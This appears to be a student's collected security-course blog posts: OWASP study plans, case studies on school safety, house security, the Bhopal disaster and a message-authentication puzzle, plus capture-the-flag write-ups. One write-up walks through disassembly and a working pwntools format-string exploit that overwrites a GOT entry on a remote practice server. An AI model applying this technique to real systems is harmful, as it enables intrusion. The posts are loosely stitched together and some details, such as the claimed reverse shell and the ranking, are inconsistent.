#comp6441

Idea:

Understand and explain the OWASP compiled most critical security risk to web applications in a series of posts.

What is OWASP?

OWASP - Open Web Application Security Project, an online community working to contribute in the field of web application security. OWASP releases standard awareness documentation containing information about most critical security risk for developers and web application security.

Background:

I am a web developer by profession. Security is always a critical aspect to consider when developing any application, specially web-based application.

OWASP - Open Web Application Security Project is a go to place for web application security. I have always thought of going through the concepts thoroughly, but never got a chance to. I am taking this idea of something-awesome as an opportunity to go through the OWASP in details myself, do some research, and explain the concept in simpler terms with relevant examples where necessary.

This way I will involve myself in cyber security literacy, and build my security engineering skills, at the same time sharing with others in simpler language will help others learn without being overwhelmed.

Action Plan:

I will host a series of posts on “web application security 101″. This will act as security stepping stones for web-application development.

Every week I will be posting the concept, its implementations along with relevant examples where necessary.

Criteria

* Pass: At least a post on security topic from OWASP every week.

* Distinction : All OWASP Top 10 explained along with example where relevant.

Contingency Plan:

Case study: Incident Response

What should be done to improve the safety of schools in the US relating to the school shootings?

Assets

Lives in general (students, staff, ...)

School reputation

Threats

School shooters - they can be:

Students (with mental health issues)

Gun owners

Mitigations

Have multiple perimeter protection (check for potential weapons)

Check for student and staff ID at the gate (can use biometrics)

Have more security guards trained to respond to gun violence

Make sure the hospitals and police stations are nearby

Security Everywhere: Houses?

How many levels of Security do average houses have?

I was walking around in the mean streets of Homebush (inner west Sydney)... And I walked by a house that had its windows and doors secured by bars and really looked nothing short of a suburban jail. 

That’s when I wondered... Can I quantify the number of layers of security for a house?

Here’s my attempt:

1. Compound Fences 2. Enclosing Walls  3. Bars 4. Home Security System 5. Dog 6. Vigilant Neighbours 7. Fake Mannequins standing around the house...  8. Security & Dog signs 9. Location of the house

Jake Paul: Infiltrating the White House

You heard me...

“YouTuber Sensation Jake Paul done goofed up real good this time...”

In one of his most recent videos, Jake Paul posted a video of himself hiding in the Presidential Whitehouse in Washington. The use of the word “Infiltrated” might have been a stretch but hey, this is how you grab attention on the internet.  It’s called Click baiting...

Here’s some context, 

Jake Paul for some reason was invited to the Whitehouse. He was authenticated and authorised to go inside as a friendly package. 

Jake Paul for some reason decided to slip away from the main event and went into the bathroom. Since he’s already inside there aren’t many people checking for unusual activity in that premise. He’s decided to turn menacing after bypassing the big security defences.

Jake Paul for some reason decides to stay in the bathroom overnight. No one checks for him in there, since it’s only a bathroom and no one even notices him missing. Menacing package decides to take over unimportant asset. Menacing package doesn’t throw off alarms. 

He then walked out at 3AM. No harm done. No items stolen. Miraculous that he’s still alive.

What a stunt. Taught me a lot about the Whitehouse’s security.

It’s a one time door... Once you’re in... You’re in...

Source: https://en.wikipedia.org/wiki/Bhopal_disaster

- Also known as the Bhopal gas tragedy, was a gas leak incident in December 1984 - World’s worst industrial disaster -> over 500 000 people were exposed to methyl isocyanate (MIC) gas - Immediate death toll = 2 259, rose to 3 787

Causes

Two main lines of argument:

- Corporate negligence: combination of under-maintained and decaying facilities, a weak attitude toward safety, culminating in worker actions that inadvertently enabled water the penetrate the tanks in the absence of properly working safeguards - Worker sabotage: argues that it was not physically possible for the water to enter the tank without concerted human effort. That extensive testimony and engineering analysis leads to a conclusion that water entered the tank when a rogue individual employee hooked a water hose directly to an empty valve on the side of the tank.

This water entry route could not be reproduced despite strenuous efforts by motivated parties. UCC claims that a “disgruntled worker” deliberately connecting a hose to a pressure gauge connection was the real cause.

Corporate Negligence

- Management (some extent, local government) underinvested in safety, which allowed for a dangerous working environment to develop - Filling of the MIC tanks beyond recommended levels, poor maintenance after the plant ceased MIC production in 1984 -> several safety systems to be inoperable due to poor maintenance, and switching off safety systems to save money (including the MIC tank refrigeration system which could have mitigated the severity of the disaster) - Undersized safety devices and the dependence on manual operations - Lack of skilled operators, reduction of safety management, insufficient maintenance and inadequate emergency action plans

Underinvestment

- Attempts to reduce expenses, $1.25 million of cuts were placed upon the plant - Promotions were halted, seriously affecting employee morale - Workers were forced to use English manuals, even though only a few had a grasp of the language - Only 6 of the 12 operators were still working with MIC and the number of supervisory personnel had also been halved - No maintenance supervisor was placed on the night shift and instrument readings were taken every 2 hours instead of every hour - 70% of the plant’s employees were fined before the disaster for refusing to deviate from the proper safety regulations under pressure from the management

Adequacy of Equipment and Regulations

- Not well equipped to handle the gas created the sudden addition of water to the MIC tank - MIC tank alarms had not been working for 4 years and there was only one manual back-up system - The flare tower and several vent gas scrubbers had been out of service for five months before the disaster - Even the steam boiler, intended to clean the pipes, were not operational for unknown reasons - Slip-blind platers were not installed and their installation had been omitted from the cleaning checklist - As MIC is water-soluble, deluge guns were in place to contain escaping gases from the stack -> the water pressure was to weak to spray high enough - The MIC tank pressure gauge had been malfunctioning for roughly a week - No action plans had been established to cope with incidents of this magnitude

Safety Audits

- Senior officials were aware of - 61 hazards, 30 of them major and 11 minor in the dangerous phosgene/methyl isocyanate units - Worker performance was below standards - Sept 1984 Audit warned “a runaway reaction could occur in the MIC until storage tanks, and that the planned response would not be timely or effective enough to prevent catastrophic failure of the tanks.”

Impossibility of the “Negligence”

- Water from work nearby was diverted due to combination of improper maintenance, leaking and clogging, and eventually ended up in the MIC storage tank. - Not possible because:

1. The pipes were only 1/2 inch and were physically incapable of producing enough hydraulic pressure to raise the water more than the 10 feet necessary to enable “back flow” into the MIC tank 2. A key intermediate value would have had to be open for the Negligence argument to apply. Marked “tagged” closed, meaning that it had been inspected and found to be closed. 3. Would have had to flow through a significant network of pipes ranging from 6 to 8 inches in diameter, before rising ten feet. Water would have remained in the pipes but Indian government investigations revealed the pipes were bone dry.

Employee Sabotage

- Claims that the incident was the result of sabotage, stating that sufficient safety systems were in place and operative to prevent the intrusion of water - Likely that a single employee secretly and deliberately introduced a large amount of water into the MIC tank by removing a meter and connecting a water hose directly to the tank through the metering port - UCC claims the plant stand falsified numerous records to distance themselves from the incident and absolve themselves of blame - The evidence in favour of this point of view includes:

Update: I actually in 3rd (or 1st) place.

This week I’ve completed almost all challenges on plsdonthaq.me hosted by some of the tutors in COMP64[84]1.

I’m going to walk through some of the interesting challenges (and some stupid ones too).

misc - shuffle

The file contains some gibberish which from the look of it I think it’s ASCII art.

I immediately notice the digits. My first guess was that they are line numbers. I wrote a simple script to sort the lines:

touch ascii.txt for i in 593 $(seq 0 593) do l=$(grep "::$i::" shuffle.txt) echo "$l" >>ascii.txt done `</pre> Flag: MAKING ASCII ART IS A KEY PART OF THE HACKERS TOOLKIT ## binary - format2 This took me the most time to solve as I was too lazy to download 32-bit Ubuntu on a VM. Eventually, I did and realised how quickly and easier it was to solve the challenge.  The file is 32-bit ELF LSB executable binary:  Note: I used[ gdb-peda](https://github.com/longld/peda). This is obviously a format string vulnerability. So I put it in GDB: <pre>`gdb-peda$ disass main Dump of assembler code for function main: 0x080491b6 <+0>: lea ecx,[esp+0x4] 0x080491ba <+4>: and esp,0xfffffff0 0x080491bd <+7>: push DWORD PTR [ecx-0x4] 0x080491c0 <+10>: push ebp 0x080491c1 <+11>: mov ebp,esp 0x080491c3 <+13>: push ebx 0x080491c4 <+14>: push ecx 0x080491c5 <+15>: call 0x80490f0 <__x86.get_pc_thunk.bx> 0x080491ca <+20>: add ebx,0x2e36 0x080491d0 <+26>: sub esp,0xc 0x080491d3 <+29>: lea eax,[ebx-0x1ff8] 0x080491d9 <+35>: push eax 0x080491da <+36>: call 0x8049070 <puts@plt> 0x080491df <+41>: add esp,0x10 0x080491e2 <+44>: mov eax,DWORD PTR [ebx-0x8] 0x080491e8 <+50>: mov eax,DWORD PTR [eax] 0x080491ea <+52>: sub esp,0xc 0x080491ed <+55>: push eax 0x080491ee <+56>: call 0x8049040 <fflush@plt> 0x080491f3 <+61>: add esp,0x10 0x080491f6 <+64>: call 0x804920a <do_the_format> 0x080491fb <+69>: mov eax,0x0 0x08049200 <+74>: lea esp,[ebp-0x8] 0x08049203 <+77>: pop ecx 0x08049204 <+78>: pop ebx 0x08049205 <+79>: pop ebp 0x08049206 <+80>: lea esp,[ecx-0x4] 0x08049209 <+83>: ret End of assembler dump.

We can see the main function is not doing much besides calling puts (probably to print the banner) and calling the do_the_format function. Going to the do_the_format function gives:

<pre>`gdb-peda$ disass do_the_format Dump of assembler code for function do_the_format: 0x0804920a <+0>: push ebp 0x0804920b <+1>: mov ebp,esp 0x0804920d <+3>: push ebx 0x0804920e <+4>: sub esp,0x74 0x08049211 <+7>: call 0x80490f0 <__x86.get_pc_thunk.bx> 0x08049216 <+12>: add ebx,0x2dea 0x0804921c <+18>: mov eax,gs:0x14 0x08049222 <+24>: mov DWORD PTR [ebp-0xc],eax 0x08049225 <+27>: xor eax,eax 0x08049227 <+29>: sub esp,0x8 0x0804922a <+32>: lea eax,[ebx-0x2d42] 0x08049230 <+38>: push eax 0x08049231 <+39>: lea eax,[ebx-0x1e60] 0x08049237 <+45>: push eax 0x08049238 <+46>: call 0x8049030 <printf@plt> 0x0804923d <+51>: add esp,0x10 0x08049240 <+54>: mov eax,DWORD PTR [ebx-0x8] 0x08049246 <+60>: mov eax,DWORD PTR [eax] 0x08049248 <+62>: sub esp,0xc 0x0804924b <+65>: push eax 0x0804924c <+66>: call 0x8049040 <fflush@plt> 0x08049251 <+71>: add esp,0x10 0x08049254 <+74>: mov eax,DWORD PTR [ebx-0xc] 0x0804925a <+80>: mov eax,DWORD PTR [eax] 0x0804925c <+82>: sub esp,0x4 0x0804925f <+85>: push eax 0x08049260 <+86>: push 0x63 0x08049262 <+88>: lea eax,[ebp-0x71] 0x08049265 <+91>: push eax 0x08049266 <+92>: call 0x8049050 <fgets@plt> 0x0804926b <+97>: add esp,0x10 0x0804926e <+100>: mov BYTE PTR [ebp-0xd],0x0 0x08049272 <+104>: sub esp,0xc 0x08049275 <+107>: lea eax,[ebp-0x71] 0x08049278 <+110>: push eax 0x08049279 <+111>: call 0x8049030 <printf@plt> 0x0804927e <+116>: add esp,0x10 0x08049281 <+119>: sub esp,0xc 0x08049284 <+122>: lea eax,[ebx-0x1d88] 0x0804928a <+128>: push eax 0x0804928b <+129>: call 0x8049070 <puts@plt> 0x08049290 <+134>: add esp,0x10 0x08049293 <+137>: mov eax,DWORD PTR [ebx-0x8] 0x08049299 <+143>: mov eax,DWORD PTR [eax] 0x0804929b <+145>: sub esp,0xc 0x0804929e <+148>: push eax 0x0804929f <+149>: call 0x8049040 <fflush@plt> 0x080492a4 <+154>: add esp,0x10 0x080492a7 <+157>: nop 0x080492a8 <+158>: mov eax,DWORD PTR [ebp-0xc] 0x080492ab <+161>: xor eax,DWORD PTR gs:0x14 0x080492b2 <+168>: je 0x80492b9 <do_the_format+175> 0x080492b4 <+170>: call 0x8049360 <__stack_chk_fail_local> 0x080492b9 <+175>: mov ebx,DWORD PTR [ebp-0x4] 0x080492bc <+178>: leave 0x080492bd <+179>: ret End of assembler dump.

The entry point of attack is the printf function located at 0x08049279, also right after that is puts at 0x0804928b and fflush at 0x0804929f. I know this based on the analysis of the good old Ghidra:

We can see the printf function is taking the variable that has our input with a buffer of 100 in length.

Another function we can see is print_the_flag, which is located at 0x80492be:

So far we’ve got:

Vulnerable printf at 0x08049279

Buffer size is 100* 2 functions to be a trampoline to jump to print_the_flag

puts at 0x0804928b

fflush at 0x0804929f* Function to get flag at 0x80492be

Great, now it’s time to exploit.

We first need to find the eip. We can easily do that by doing the good old AAAA%x trick:

It looks like our input is at the 6th address on the stack (A=0x41) but with a padding of some sort. We can verify this by having an extra character at the start:

Note: I’ve also used %6$p to print the value of the 6th address on the stack, which is our input (with a padding of 1 character of course).

Now we need to get the GOT address of either of the two trampoline functions, here I will choose fflush:

0x0804929f <+149&>: call 0x8049040 <fflush@plt>

We can see in the do_the_format function, it is calling fflush at 

0x8049040.

We can examine this address using gdb:

Sure enough, the address is a jump call to 0x804c010, which is the address of fflush in the GOT.

Now we just need to modify 0x804c010 to be 0x80492be, which is where the print_the_flag function located.

I’ve written a Python script to print out the payload:

import struct from pwn import * FLAG = 0x80492be FFLUSH = 0x804c010 def pad(s): return s+"X"*(100-len(s)) exploit = " " exploit += struct.pack("I", FFLUSH) exploit += struct.pack("I", FFLUSH+2) exploit += "%2043x" exploit += "%7$hn" exploit += "%35514x" exploit += "%6$hn" exploit = pad(exploit) r = remote('plsdonthaq.me', 1002) r.recvuntil(">") r.sendline(exploit) r.interactive()

More info on how this script is written here.

Executing the script gives us a reverse shell:

More writeups can be found on my Github here.

Conclusion

I’ve managed to come 4th (or 3rd):

I’ve solved most of the challenges and found them quite intuitive after the course:

Case study: Ghost

Suppose you are the friendly Major M from the base who can see the alien A but who cannot see the invisible man X.

Q: What would you M do to get from X his report on the Alien's (A's) planet?

Analysis

This is similar to the case with Houdini where he had to communicate through mediums. In this case, we need to authenticate and verify the message.

A few important things I think is necessary for the communication protocol to work:

Each message must be verified

The Alien cannot be trusted

Protocol

We had two approaches to this problem.

My approach is to tell X (since they can hear us but not able to talk to us) to follow us to a discrete place. We can then trade keys which we can use to encrypt each of our messages. Then we can return back to the room with the alien and start exchanging conversation. If the encrypted message from the alien cannot be decrypted using our proposed keys, we then know the alien is lying and the message is not correctly relayed to us.

Another way is to first share a secret way to verify a message if it’s correctly translated or not. We can do this for every message and the phrase for verifying would have to be secret to the alien.

In both approaches, we assume that the alien is compliance and we can safely share our secrets without the alien knowing. Also, there is no way to force the alien to correctly translate the message if it doesn’t want to.

Conclusion